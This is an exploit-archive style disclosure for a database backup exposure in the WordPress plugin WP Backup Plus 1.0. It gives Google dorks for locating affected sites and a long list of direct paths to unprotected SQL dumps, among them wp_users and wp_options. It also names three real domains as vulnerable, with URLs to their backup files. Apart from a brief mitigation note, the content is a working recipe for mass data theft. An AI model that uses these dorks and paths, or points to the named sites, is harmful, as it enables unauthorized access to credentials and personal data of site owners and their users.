################################################################################################# # Exploit Title : WordPress WP Backup Plus + 1.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Vendor Homepage : wpbackupplus.com ~ wplaunchpad.io ~ wordpress.org # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/'' # Exploit Risk : Medium # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/uploads/wp-backup-plus/temp/'' # CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110143 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2245 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31472 # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] - CWE-23 [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] - CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Note : The plugin writes its per-table SQL dumps and the zipped backup into a temp directory under the web-served wp-content/uploads tree with no access control of its own, so any backup left there (including wp_users and wp_options) is readable by an unauthenticated visitor; the mitigation on the site side is to remove stale backups from that directory and deny web access to it at the server level. # Exploit : /wp-content/uploads/wp-backup-plus/temp/database.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql /wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql /wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql /wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql /wp-content/uploads/wp-backup-plus/temp/wp_comments.sql /wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql /wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql 
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql /wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql /wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql /wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_links.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql /wp-content/uploads/wp-backup-plus/temp/wp_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql /wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql /wp-content/uploads/wp-backup-plus/temp/wp_pls.sql /wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql /wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql 
/wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql /wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql /wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql /wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql /wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql /wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql /wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql 
/wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql /wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql /wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql /wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql /wp-content/uploads/wp-backup-plus/temp/wp_terms.sql /wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql /wp-content/uploads/wp-backup-plus/temp/wp_users.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql /wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql /wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql /wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql /wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql /wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20v IjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip /wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vI jtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log 
################################################################################################# # Example Vulnerable Sites => [+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql [+] curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql [+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/ ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################